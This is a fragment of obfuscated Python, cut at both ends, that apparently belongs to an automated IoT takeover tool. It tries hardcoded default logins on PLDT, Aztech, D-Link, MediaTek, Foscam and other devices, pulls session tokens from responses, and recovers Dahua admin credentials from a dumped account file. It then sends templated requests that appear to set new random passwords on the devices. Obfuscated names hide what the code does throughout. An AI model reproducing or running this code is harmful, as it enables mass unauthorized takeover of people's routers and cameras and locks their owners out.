77: O0oo Oo00oO0O = re . search ( 'SESSION=(\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 96 - 96: oOoO0Ooo if iii == 'pldtfibr' : if ooOoO0o [ iiIii1I1i1 ] <= 2 : if 40 - 40: IIiIii1iI % OOooOO0 if '/menu_pldt.asp' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'adminpldt' IIi1i [ iiIii1I1i1 ] = '0123456789' ooOoO0o [ iiIii1I1i1 ] = 2 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'adminpldt' IIi1i [ iiIii1I1i1 ] = '1234567890' ooOoO0o [ iiIii1I1i1 ] = 2 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '1234' ooOoO0o [ iiIii1I1i1 ] = 2 else : if ooOoO0o [ iiIii1I1i1 ] >= 2 : ooOoO0o [ iiIii1I1i1 ] = 99 if ooOoO0o [ iiIii1I1i1 ] == 3 : IIIiI [ iiIii1I1i1 ] = '' . join ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678901234567890123456789' ) for i in range ( 8 ) ) ooOoO0o [ iiIii1I1i1 ] += 1 if 38 - 38: I11I1Ii . i1 / o0oooooO % oOOoO00oo0 / IIiIIiIii1I * i1IIi1i1iiI if iii == 'foscamold' : if ooOoO0o [ iiIii1I1i1 ] == 0 : if 87 - 87: OOooOO0 - Oooo + IIiII / oOOo0000o if 'HTTP/1.1 200 O' in O0Oooo0ooo0 [ I11i1I ] : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '' else : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 88 - 88: oOoO0Ooo . IIiII + IIiII if iii == 'telkomdlink' : if ooOoO0o [ iiIii1I1i1 ] == 0 : if 36 - 36: oOoO0Ooo * Oo0 - oOOo0000o / OOooOO0 if 'HTTP/1.1 200 O' in O0Oooo0ooo0 [ I11i1I ] : IiIi11iii [ iiIii1I1i1 ] = 'support' IIi1i [ iiIii1I1i1 ] = 'TelkomDlink12345' else : ooOoO0o [ iiIii1I1i1 ] = 99 else : if 'sessionKey' in O0Oooo0ooo0 [ I11i1I ] : Oo00oO0O = re . search ( 'sessionKey=\'?(\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) if 20 - 20: Oooo % Oo0Oo * Oooo % IIiII * IIiIii1iI / IIiIIiIii1I ooOoO0o [ iiIii1I1i1 ] += 1 if 4 - 4: OOooOO0 + IIiII % O0oo0OOOOO00 if iii == 'aztechweb' : if ooOoO0o [ iiIii1I1i1 ] <= 4 : if 64 - 64: I11I1Ii - Ii11i1iIi + OOooOO0 * Oooo Oo00oO0O = re . search ( 'SESSIONID=(\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'bayandsl' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'epicrouter' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 3 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'password' ooOoO0o [ iiIii1I1i1 ] = 4 elif ooOoO0o [ iiIii1I1i1 ] == 4 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = '' ooOoO0o [ iiIii1I1i1 ] = 4 else : if ooOoO0o [ iiIii1I1i1 ] >= 4 : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 80 - 80: i1IIi1i1iiI + IIiIii1iI - OOOoOooO - i1IIi1i1iiI if iii == 'netgeardgn1022' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 40 - 40: OOooOO0 . IIiII % oOOo0000o if iii == 'netgearr7064' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 87 - 87: O0oo0OOOOO00 if iii == 'vacron' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 80 - 80: I11I1Ii * Ii % o0ooO if iii == 'jaws' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 67 - 67: o0ooO . Oo0 . OOOoOooO * o0ooO * o0oooooO % I11I1Ii if iii == 'readynas' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 4 - 4: Oo0Oo - IIiIii1iI if iii == 'airosfile' : IiIi11iii [ iiIii1I1i1 ] = 'n' IIi1i [ iiIii1I1i1 ] = 'a' ooOoO0o [ iiIii1I1i1 ] += 1 if 93 - 93: O0oo / I11I1Ii if iii == 'xionghash' : if 92 - 92: Ii11i1iIi + IIiIii1iI / oOOoO00oo0 % OOooOO0 % IIiIIiIii1I * IIiIii1iI if 59 - 59: IIiII * IIiIii1iI if 81 - 81: I11I1Ii % o0oooooO / oOOo0000o / o0oooooO * OOooOO0 ooO000OoOO0 = re . sub ( "[\r\n]" , '' , O0Oooo0ooo0 [ I11i1I ] ) Oo00oO0O = re . search ( 'Name"\s+:\s+"admin",.*?"Password"\s+:\s+"([A-Za-z0-9]{8})"' , ooO000OoOO0 ) if Oo00oO0O : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 93 - 93: oOOo0000o % I11I1Ii if iii == 'mediatekajax' : if 62 - 62: oOOo0000o % Oooo / i1 if ooOoO0o [ iiIii1I1i1 ] <= 5 : if '?sid=' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 5 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin123' ooOoO0o [ iiIii1I1i1 ] = 5 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin1234' ooOoO0o [ iiIii1I1i1 ] = 5 elif ooOoO0o [ iiIii1I1i1 ] == 3 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'password' ooOoO0o [ iiIii1I1i1 ] = 5 elif ooOoO0o [ iiIii1I1i1 ] == 4 : IiIi11iii [ iiIii1I1i1 ] = 'user' IIi1i [ iiIii1I1i1 ] = 'user' ooOoO0o [ iiIii1I1i1 ] = 5 elif ooOoO0o [ iiIii1I1i1 ] == 5 : IiIi11iii [ iiIii1I1i1 ] = 'guest' IIi1i [ iiIii1I1i1 ] = 'guest' ooOoO0o [ iiIii1I1i1 ] = 5 else : if ooOoO0o [ iiIii1I1i1 ] >= 5 : ooOoO0o [ iiIii1I1i1 ] = 99 if 72 - 72: IIiII / I11I1Ii Oo00oO0O = re . search ( '\?sid=([a-zA-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 83 - 83: I11I1Ii + IIiII - oOOoO00oo0 / i1IIi1i1iiI - i1IIi1i1iiI if iii == 'mediatekwimax' : if 8 - 8: O0oo0OOOOO00 + oOoO0Ooo / o0ooO if ooOoO0o [ iiIii1I1i1 ] <= 3 : if 26 - 26: Oo0 - Oooo % OOOoOooO if '?WWW_SID=SID' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 3 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'user' IIi1i [ iiIii1I1i1 ] = 'user' ooOoO0o [ iiIii1I1i1 ] = 3 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'guest' IIi1i [ iiIii1I1i1 ] = 'guest' ooOoO0o [ iiIii1I1i1 ] = 3 elif ooOoO0o [ iiIii1I1i1 ] == 3 : IiIi11iii [ iiIii1I1i1 ] = 'guest' IIi1i [ iiIii1I1i1 ] = 'linkem123' ooOoO0o [ iiIii1I1i1 ] = 3 else : if ooOoO0o [ iiIii1I1i1 ] >= 3 : ooOoO0o [ iiIii1I1i1 ] = 99 if 34 - 34: I11I1Ii / IIiIii1iI * oOOoO00oo0 - O0oo0OOOOO00 * IIiIIiIii1I . IIiII Oo00oO0O = re . search ( '\?WWW_SID=(SID\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 90 - 90: oOoO0Ooo . oOOo0000o if iii == 'mediatekrpc' : if 45 - 45: IIiII . Oooo / Oo0Oo / o0ooO . I11I1Ii if ooOoO0o [ iiIii1I1i1 ] <= 2 : if '?WWW_SID=' in O0Oooo0ooo0 [ I11i1I ] : if ooOoO0o [ iiIii1I1i1 ] == 0 : IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' ooOoO0o [ iiIii1I1i1 ] = 2 elif ooOoO0o [ iiIii1I1i1 ] == 1 : IiIi11iii [ iiIii1I1i1 ] = 'user' IIi1i [ iiIii1I1i1 ] = 'user' ooOoO0o [ iiIii1I1i1 ] = 2 elif ooOoO0o [ iiIii1I1i1 ] == 2 : IiIi11iii [ iiIii1I1i1 ] = 'guest' IIi1i [ iiIii1I1i1 ] = 'guest' ooOoO0o [ iiIii1I1i1 ] = 2 else : if ooOoO0o [ iiIii1I1i1 ] >= 2 : ooOoO0o [ iiIii1I1i1 ] = 99 if 85 - 85: OOOoOooO + Oo0Oo * IIiII / i1 - oOOoO00oo0 Oo00oO0O = re . search ( '\?WWW_SID=([A-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) ooOoO0o [ iiIii1I1i1 ] += 1 if 4 - 4: O0oo . O0oo0OOOOO00 * o0ooO / IIiIii1iI - IIiII - Ii if iii == 'mdmweb' : if 99 - 99: IIiIii1iI + OOOoOooO . oOOo0000o if ooOoO0o [ iiIii1I1i1 ] == 0 : if 31 - 31: oOOoO00oo0 % i1 Oo00oO0O = re . search ( '"result":"0".*"token":"([^"]+)"' , O0Oooo0ooo0 [ I11i1I ] ) ; if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' if 43 - 43: Oooo * Oooo ooOoO0o [ iiIii1I1i1 ] = 1 if 48 - 48: oOOoO00oo0 % I11I1Ii - IIiIii1iI if 1 - 1: i1IIi1i1iiI + Ii . o0ooO elif ooOoO0o [ iiIii1I1i1 ] == 1 : if 78 - 78: IIiII Oo00oO0O = re . search ( '"result":"0".*"token":"([^"]+)"' , O0Oooo0ooo0 [ I11i1I ] ) ; if Oo00oO0O : IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) IiIi11iii [ iiIii1I1i1 ] = 'admin' IIi1i [ iiIii1I1i1 ] = 'admin' if 29 - 29: i1 * Oooo else : ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 if 51 - 51: OOOoOooO if iii == 'dahua' : if 54 - 54: Oooo if ooOoO0o [ iiIii1I1i1 ] == 0 : if 34 - 34: I11I1Ii + Oo0 + OOOoOooO * oOOoO00oo0 / i1IIi1i1iiI % oOOoO00oo0 ii1i1Ii = O0Oooo0ooo0 [ I11i1I ] . split ( '\n' ) i1iiIiIIIiI = [ ] for III1I in ii1i1Ii : if 49 - 49: Ii11i1iIi / o0oooooO Oo00oO0O = re . search ( '^\d:([^:]+):([^:]+):\d+\S+,\s+\S+,' , III1I ) if Oo00oO0O : i1iiIiIIIiI . append ( Oo00oO0O . group ( 1 ) + "/" + Oo00oO0O . group ( 2 ) ) if len ( i1iiIiIIIiI ) > 0 : OO0O = - 1 for iIiI1iiiii11II1 in range ( len ( i1iiIiIIIiI ) ) : if 'admin/' in i1iiIiIIIiI [ iIiI1iiiii11II1 ] : OO0O = iIiI1iiiii11II1 break if '888888/' in i1iiIiIIIiI [ iIiI1iiiii11II1 ] : OO0O = iIiI1iiiii11II1 break if OO0O < 0 : if 50 - 50: O0oo0OOOOO00 + i1IIi1i1iiI if 'default/' in i1iiIiIIIiI [ 0 ] and len ( i1iiIiIIIiI ) > 1 : OO0O = 1 else : OO0O = 0 IiiI1II1111I1 [ iiIii1I1i1 ] = i1iiIiIIIiI [ OO0O ] . split ( '/' ) [ 0 ] iIiIi1II11 [ iiIii1I1i1 ] = i1iiIiIIIiI [ OO0O ] . split ( '/' ) [ 1 ] Ii1ii [ iiIii1I1i1 ] = 'OldDigest' IiIi11iii [ iiIii1I1i1 ] = IiiI1II1111I1 [ iiIii1I1i1 ] IIi1i [ iiIii1I1i1 ] = iIiIi1II11 [ iiIii1I1i1 ] if len ( iIiIi1II11 [ iiIii1I1i1 ] ) == 32 : if 52 - 52: I11I1Ii OOoOoooOo0 = 1 Ii1ii [ iiIii1I1i1 ] = 'Default' else : if 69 - 69: oOOoO00oo0 + IIiIii1iI + O0oo * o0oooooO - i1 * Oo0 ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 elif ooOoO0o [ iiIii1I1i1 ] == 1 : if 12 - 12: oOoO0Ooo * i1 Oo00oO0O = re . search ( '"session"\s*:\s*(\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : if 67 - 67: Oooo ooOo [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) if 86 - 86: Oo0Oo / IIiIii1iI / Oooo if 77 - 77: oOOoO00oo0 if len ( iIiIi1II11 [ iiIii1I1i1 ] ) == 32 : Oo00oO0O = re . search ( '"random"\s*:\s*"?(\d+)"?' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : if 47 - 47: IIiIii1iI o00Oo0Oo0O = IiIi11iii [ iiIii1I1i1 ] + ":" + Oo00oO0O . group ( 1 ) + ":" + iIiIi1II11 [ iiIii1I1i1 ] if 68 - 68: Ii11i1iIi ii1iI1Ii = '' if 5 - 5: Oo0 . Oo0Oo if 1 : iII1Ii1iIiIII = subprocess . Popen ( 'echo -n ' + o00Oo0Oo0O + '|md5sum' , shell = True , stdout = subprocess . PIPE ) O0 = iII1Ii1iIiIII . communicate ( ) [ 0 ] Oo00oO0O = re . search ( '([a-f0-9]{32})' , O0 ) if Oo00oO0O : iIiIi1II11 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) . upper ( ) if 41 - 41: oOOo0000o % Oooo - Oooo / OOOoOooO % oOOo0000o if 88 - 88: O0oo0OOOOO00 / Ii . Ii11i1iIi + Ii . O0oo ooOoO0o [ iiIii1I1i1 ] += 1 IIiiI [ I11i1I ] = time . time ( ) Ooo000Oo [ I11i1I ] = I1I1IIi1i1I [ iiIii1I1i1 ] [ ooOoO0o [ iiIii1I1i1 ] ] O0o00oO ( sock , I11i1I , iiIii1I1i1 ) return if 16 - 16: IIiIii1iI + Oooo * Ii11i1iIi if 9 - 9: Oooo if 55 - 55: oOOoO00oo0 if 58 - 58: i1 / o0ooO * oOOoO00oo0 else : if 18 - 18: o0oooooO % IIiII % oOoO0Ooo % Oo0Oo ooOoO0o [ iiIii1I1i1 ] = 99 ooOoO0o [ iiIii1I1i1 ] += 1 else : if O0oOO [ iiIii1I1i1 ] : if 55 - 55: IIiIii1iI * o0oooooO . i1 % i1IIi1i1iiI / o0oooooO ooOoO0o [ iiIii1I1i1 ] += 1 if ooOoO0o [ iiIii1I1i1 ] >= len ( I1I1IIi1i1I [ iiIii1I1i1 ] ) - 1 : if 13 - 13: Oo0 + i1 + OOooOO0 / I11I1Ii O0oOO [ iiIii1I1i1 ] = 0 OOoOoooOo0 = 0 try : sock . close ( ) except : pass else : IIiiI [ I11i1I ] = time . time ( ) Ooo000Oo [ I11i1I ] = I1I1IIi1i1I [ iiIii1I1i1 ] [ ooOoO0o [ iiIii1I1i1 ] ] O0o00oO ( sock , I11i1I , iiIii1I1i1 ) return else : ooOoO0o [ iiIii1I1i1 ] += 1 if 19 - 19: o0ooO % IIiII * Oo0 . O0oo - IIiIii1iI * Ii if 88 - 88: o0oooooO % o0oooooO * o0ooO * i1 - O0oo if O0oOO [ iiIii1I1i1 ] : if 73 - 73: IIiIii1iI Ii111i11iIi ( "NOTC: Untrapped keepalive" ) try : sock . close ( ) except : pass if OOoOoooOo0 : if 42 - 42: I11I1Ii O0oOO [ iiIii1I1i1 ] = OOoOoooOo0 if 16 - 16: o0oooooO if 73 - 73: o0oooooO + O0oo0OOOOO00 if 100 - 100: oOOoO00oo0 % o0oooooO % Oo0Oo if 21 - 21: oOoO0Ooo * i1IIi1i1iiI + Oo0 + IIiII * O0oo0OOOOO00 - i1IIi1i1iiI if 5 - 5: O0oo0OOOOO00 % IIiII if 24 - 24: Ii11i1iIi / OOOoOooO + I11I1Ii + o0oooooO Iioo0OooOoO = time . time ( ) if o0O00OO [ iiIii1I1i1 ] <= Iioo0OooOoO : o0O00OO [ iiIii1I1i1 ] = time . time ( ) + iI1iiii11I11I OO0 [ iiIii1I1i1 ] = None if 58 - 58: IIiIii1iI - oOOoO00oo0 - OOOoOooO + Ii i11IiiI1I . remove ( sock ) o0o0000OO [ I11i1I ] = None IIi1i1iiii1Ii [ I11i1I ] = None Ooo000Oo [ I11i1I ] = None O0Oooo0ooo0 [ I11i1I ] = None IIiiI [ I11i1I ] = None O0000o0 [ I11i1I ] = None if 10 - 10: oOOoO00oo0 / i1IIi1i1iiI % IIiIIiIii1I def OooOo0o0oO0 ( ) : Iioo0OooOoO = time . time ( ) OO00ooo0 = O000oo0 for IIIiiiI in OO00ooo0 : iiIii1I1i1 = hash ( IIIiiiI ) if 68 - 68: IIiIii1iI - o0ooO % o0oooooO + Ii11i1iIi / OOooOO0 if OO0 [ iiIii1I1i1 ] == None : if 97 - 97: oOoO0Ooo + IIiIIiIii1I . O0oo0OOOOO00 + IIiIIiIii1I if ooOoO0o [ iiIii1I1i1 ] >= len ( I1I1IIi1i1I [ iiIii1I1i1 ] ) : if 32 - 32: OOooOO0 * oOOo0000o + O0oo / O0oo0OOOOO00 + Oooo % oOOo0000o oo0O0o0Oo ( iiIii1I1i1 ) continue if 76 - 76: I11I1Ii + IIiII . o0oooooO - oOOoO00oo0 if 98 - 98: IIiIii1iI % oOoO0Ooo / Ii11i1iIi . i1 if Iioo0OooOoO >= o0O00OO [ iiIii1I1i1 ] : if 52 - 52: i1IIi1i1iiI % oOOo0000o . oOOoO00oo0 * IIiII O0OOo00o00o = oOoo0 ( O0oOoo [ iiIii1I1i1 ] [ 0 ] , O0oOoo [ iiIii1I1i1 ] [ 1 ] , I1I1IIi1i1I [ iiIii1I1i1 ] [ ooOoO0o [ iiIii1I1i1 ] ] , iiIii1I1i1 ) OO0 [ iiIii1I1i1 ] = O0OOo00o00o o0O00OO [ iiIii1I1i1 ] = 0 if 95 - 95: Oooo . O0oo0OOOOO00 + Oo0 * IIiIIiIii1I if 77 - 77: oOOo0000o * oOOoO00oo0 * o0ooO % oOoO0Ooo % O0oo def O0o00oO ( sock , webhash , jobhash ) : if 1 - 1: o0ooO * Oo0 . OOOoOooO O000oO0o = random . uniform ( 30 , 254 ) i1i11I1iI = random . uniform ( 1 , 254 ) if 65 - 65: OOooOO0 * OOooOO0 . o0oooooO + Oo0Oo / Ii11i1iIi . oOOo0000o if '%' in Ooo000Oo [ webhash ] : if '%%TARGETIP%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%TARGETIP%%' , O0oOoo [ jobhash ] [ 0 ] , Ooo000Oo [ webhash ] ) if '%%TARGETPORT%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%TARGETPORT%%' , '%d' % ( O0oOoo [ jobhash ] [ 1 ] ) , Ooo000Oo [ webhash ] ) if '%%LOGIN%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%LOGIN%%' , IiIi11iii [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%PASSWORD%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%PASSWORD%%' , IIi1i [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%NEWPASSWORD%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%NEWPASSWORD%%' , IIIiI [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%CUSTOM1%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM1%%' , IiiI1II1111I1 [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%CUSTOM2%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM2%%' , ooOo [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%CUSTOM3%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM3%%' , iIiIi1II11 [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%CUSTOM4%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%CUSTOM4%%' , Ii1ii [ jobhash ] , Ooo000Oo [ webhash ] ) if '%%RAND16%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%RAND16%%' , '%d.%d' % ( O000oO0o , random . uniform ( 20 , 200 ) ) , Ooo000Oo [ webhash ] ) if '%%COMP16%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%COMP16%%' , '%d.%d' % ( O000oO0o , random . uniform ( 201 , 253 ) ) , Ooo000Oo [ webhash ] ) if '%%RAND8%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%RAND8%%' , '%d.%d.%d' % ( O000oO0o , i1i11I1iI , random . uniform ( 20 , 200 ) ) , Ooo000Oo [ webhash ] ) if '%%COMP8%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%COMP8%%' , '%d.%d.%d' % ( O000oO0o , i1i11I1iI , random . uniform ( 201 , 253 ) ) , Ooo000Oo [ webhash ] ) if '%%RHEX1%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%RHEX1%%' , '' . join ( random . choice ( 'ABCDEF0123456789' ) for i in range ( 2 ) ) , Ooo000Oo [ webhash ] ) if '%%RHEX2%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%RHEX2%%' , '' . join ( random . choice ( 'ABCDEF0123456789' ) for i in range ( 2 ) ) , Ooo000Oo [ webhash ] ) if '%%RHEX3%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%RHEX3%%' , '' . join ( random . choice ( 'ABCDEF0123456789' ) for i in range ( 2 ) ) , Ooo000Oo [ webhash ] ) if '%%RANDPORT%%' in Ooo000Oo [ webhash ] : Ooo000Oo [ webhash ] = re . sub ( '%%RANDPORT%%' , '%d' % ( random . uniform ( 10000 , 65000 ) ) , Ooo000Oo [ webhash ] ) if 27 - 27: Oo0Oo * i1 if '%%BODYLENGTH%%' in Ooo000Oo [ webhash ] : i1iIII = Ooo000Oo [ webhash ] . find ( '\r\n\r\n' ) Oo00Ooo0O0Oo = - 1 if i1iIII >= 0 : i1iIII += 4 else : i1iIII = Ooo000Oo [ webhash ] . find ( '\n\n' ) if i1iIII >= 0 : i1iIII += 2 if 100 - 100: OOOoOooO % oOOo0000o + I11I1Ii if i1iIII >= 0 : if 68 - 68: o0ooO * Oo0 . Oo0Oo . IIiIIiIii1I / O0oo - oOoO0Ooo if 100 - 100: IIiII * o0oooooO % i1 / Ii11i1iIi / O0oo0OOOOO00 * IIiIIiIii1I if 10 - 10: oOoO0Ooo % Ii / IIiII % oOOo0000o . i1IIi1i1iiI % Oo0 if 82 - 82: oOoO0Ooo + IIiIii1iI / Oo0 + IIiIii1iI % OOooOO0 Oo00Ooo0O0Oo = ( len ( Ooo000Oo [ webhash ] ) - i1iIII ) if 81 - 81: Ii . oOOoO00oo0 * Ii % O0oo0OOOOO00 * IIiII % O0oo Ooo000Oo [ webhash ] = re . sub ( '%%BODYLENGTH%%' , '%d' % ( Oo00Ooo0O0Oo ) , Ooo000Oo [ webhash ] ) try : if 98 - 98: OOooOO0 sock . send ( Ooo000Oo [ webhash ] ) except : pass if 17 - 17: O0oo * IIiIIiIii1I return 1 if 74 - 74: IIiIii1iI / o0ooO % IIiIIiIii1I - o0ooO def O00o0oOOO0O0 ( ) : global IIIIiI global webclient_maxconnectiontime_payload if 7 - 7: OOooOO0 Iioo0OooOoO = time . time ( ) if 18 - 18: O0oo . IIiIii1iI if 38 - 38: Oooo / oOOoO00oo0 . o0ooO / o0ooO O00Oo = 0.01 IIiI1i , O0o0 , IiIIiI11I = select . select ( i11IiiI1I , i11IiiI1I , [ ] , O00Oo ) for O0O0 in i11IiiI1I : I11i1I = hash ( O0O0 ) o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) if o0oo0OOOo != 0 : if 8 - 8: I11I1Ii . oOOo0000o - O0oo if O0Oooo0ooo0 [ I11i1I ] == '' : O0Oooo0ooo0 [ I11i1I ] = '(timeout)' ; iIiIii111Ii ( O0O0 ) continue if O0O0 in IIiI1i : O0 = '' try : O0 = O0O0 . recv ( 2048 ) except : pass if O0 : O0Oooo0ooo0 [ I11i1I ] += O0 if 84 - 84: I11I1Ii if 33 - 33: O0oo . o0ooO - o0ooO - oOOo0000o . o0oooooO / i1 if 74 - 74: Oooo - IIiII * OOooOO0 - Ii + Ii11i1iIi if 24 - 24: Oooo + oOOo0000o . o0ooO / oOOoO00oo0 % IIiII / Ii i1iIII = O0Oooo0ooo0 [ I11i1I ] . find ( '\r\n\r\n' ) if i1iIII >= 0 : i1iIII += 4 else : i1iIII = O0Oooo0ooo0 [ I11i1I ] . find ( '\n\n' ) if i1iIII >= 0 : i1iIII += 2 if 86 - 86: Oo0 / o0oooooO * Oooo . Oo0 - oOOoO00oo0 if i1iIII >= 0 : if 78 - 78: OOOoOooO + OOOoOooO * o0ooO % o0ooO Oo00oO0O = re . search ( 'Content-Length:\s*(\d+)' , O0Oooo0ooo0 [ I11i1I ] ) if Oo00oO0O : Oo00Ooo0O0Oo = int ( Oo00oO0O . group ( 1 ) ) if 95 - 95: Oooo / i1IIi1i1iiI + oOoO0Ooo % I11I1Ii / Oooo / IIiIii1iI if 28 - 28: OOooOO0 * oOOoO00oo0 + oOOo0000o % I11I1Ii / IIiII * i1 if 49 - 49: IIiIii1iI / OOOoOooO + OOooOO0 / Ii . o0ooO if 27 - 27: oOOoO00oo0 . Oo0 * o0ooO . Ii - O0oo0OOOOO00 if len ( O0Oooo0ooo0 [ I11i1I ] ) - i1iIII == Oo00Ooo0O0Oo : if 69 - 69: Ii11i1iIi / Oo0 % o0oooooO + Ii11i1iIi iIiIii111Ii ( O0O0 ) continue if 55 - 55: Oo0 - O0oo0OOOOO00 % Ii11i1iIi . IIiII . O0oo0OOOOO00 / IIiIIiIii1I if 93 - 93: OOOoOooO + Oooo + OOooOO0 - OOOoOooO else : iIiIii111Ii ( O0O0 ) continue if O0O0 in O0o0 : if IIi1i1iiii1Ii [ I11i1I ] == 0 : if 98 - 98: IIiIIiIii1I + IIiII + i1IIi1i1iiI iiIii1I1i1 = O0000o0 [ I11i1I ] O0o00oO ( O0O0 , I11i1I , iiIii1I1i1 ) IIi1i1iiii1Ii [ I11i1I ] = 1 if 43 - 43: oOoO0Ooo / Ii * Oo0Oo OoO0oOoooo = 